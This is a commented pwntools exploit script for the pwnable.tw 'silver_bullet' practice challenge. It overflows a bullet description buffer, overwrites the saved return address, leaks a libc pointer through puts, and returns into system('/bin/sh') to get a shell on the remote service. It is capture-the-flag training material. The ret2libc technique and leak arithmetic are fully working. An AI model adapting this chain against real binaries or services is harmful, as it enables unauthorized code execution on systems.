- import sys
- from pwn import *
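# Libc the remote service is known to ship; preloading it for the local run
# makes the offsets and leak arithmetic below match the remote target.
env = {
    "LD_PRELOAD": "./libc_32.so.6"
}
glibc = ELF("./libc_32.so.6")
# Raw offset of system() in the libc image (glibc.address is still 0 here).
print(glibc.symbols['system'])
context(os='linux', arch='i386', log_level='debug')

GDB = 1
# Kept for compatibility; main() computes its own libc base locally.
base = 0

# Any command-line argument selects the remote service; otherwise run the
# binary locally with ASLR off. The env dict above was previously built but
# never passed to process(), so the local process ran against the system libc
# and its leaks did not match the remote one -- pass it explicitly.
REMOTE = len(sys.argv) > 1
if REMOTE:
    r = remote("chall.pwnable.tw", 10103)
else:
    r = process("./silver_bullet", aslr=False, env=env)

# A debugger can only be attached to the local process, so the GDB toggle is
# ignored for the remote tube instead of failing the run.
if GDB and not REMOTE:
    gdb.attach(r, gdbscript='''
    b* 0x08048A18
    c
    ''')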
def create(des):
    """Menu option 1: create a bullet described by *des*.

    *des* is sent raw (no trailing newline) once the program asks for a
    description; output is then consumed through the "Good luck !!" banner.
    """
    prompt = "Give me your description of bullet :"
    banner = "Good luck !!"
    r.sendline("1")
    r.recvuntil(prompt)
    r.send(des)
    r.recvuntil(banner)
def powerup(des):
    """Menu option 2: append *des* to the current bullet's description.

    *des* is sent raw (no trailing newline) after the prompt; output is then
    consumed through the "Enjoy it !" banner.
    """
    prompt = "Give me your another description of bullet :"
    banner = "Enjoy it !"
    r.sendline("2")
    r.recvuntil(prompt)
    r.send(des)
    r.recvuntil(banner)
def beat():
    """Menu option 3: attack with the current bullet. Consumes no output."""
    choice = "3"
    r.sendline(choice)
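def main():
    """Leak a libc pointer through puts, then return into system("/bin/sh").

    Two identical rounds drive the overflow: a 47-byte description plus a
    1-byte power-up, then a second power-up whose tail lands on the saved
    return address, then two "beat" calls so the function returns into the
    planted chain. Round one calls puts on a GOT slot and returns to the
    program entry so it restarts; round two rebases libc from the leak and
    calls system("/bin/sh").
    """
    # Binary-side addresses; silver_bullet is a non-PIE i386 binary.
    PUTS_PLT = 0x080484A8   # leak call target -- presumably puts@plt, confirm in the binary
    RESTART = 0x080484F0    # where the leak chain returns -- presumably _start, confirm
    PUTS_GOT = 0x0804AFDC   # argument to the leak call -- presumably puts' GOT entry, confirm
    WIN_BANNER = "Oh ! You win !!\n"

    def overflow(target, ret_addr, arg):
        # 47 + 1 bytes make the stored length wrap so the next power-up
        # writes past the description and over the saved return address.
        create(cyclic(47))
        powerup(cyclic(1))
        # b"A" keeps the concatenation bytes-typed alongside p32() output
        # (the original str "A"*7 breaks under Python 3 pwntools).
        chain = b"A" * 7 + p32(target) + p32(ret_addr) + p32(arg)
        powerup(chain)
        beat()
        beat()

    # Round 1: puts(PUTS_GOT) prints a libc pointer, then the program restarts.
    overflow(PUTS_PLT, RESTART, PUTS_GOT)
    r.recvuntil(WIN_BANNER)
    # recvn() blocks for exactly 4 bytes; a plain recv(4) may return fewer
    # and u32 would then raise on a short read.
    puts = u32(r.recvn(4))
    # Libc is mapped page-aligned, so the low 12 bits of the leaked pointer
    # must equal those of puts' offset; abort before sending a bogus chain.
    if (puts & 0xfff) != (glibc.symbols['puts'] & 0xfff):
        log.error("leaked value %#x does not look like puts" % puts)
    glibc.address = puts - glibc.symbols['puts']
    binsh = next(glibc.search(b'/bin/sh\x00'))
    log.success("BASE: " + hex(glibc.address))
    log.success("SYSTEM: " + hex(glibc.symbols["system"]))
    log.success("/bin/sh: " + hex(binsh))

    # Round 2: same overflow, now returning into system("/bin/sh").
    overflow(glibc.symbols["system"], RESTART, binsh)
    r.interactive()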
- if __name__ == "__main__":
- main()